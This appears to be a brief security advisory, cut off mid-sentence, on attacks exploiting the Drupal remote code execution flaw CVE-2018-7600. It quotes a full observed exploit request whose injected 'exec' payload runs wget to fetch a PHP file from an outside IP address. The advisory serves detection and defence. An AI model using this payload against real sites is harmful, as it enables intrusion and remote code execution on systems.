Widespread Drupal Arbitrary Code Execution

Date of Detection: 2018.3.29   Attack Pattern: URI: /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax   Request Body: form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec& mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php   Target System: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code.   Analysis: This issue is not a zero-day vulnerability and assigned as CVE-2018-7600. However, attackers are scanning and[…]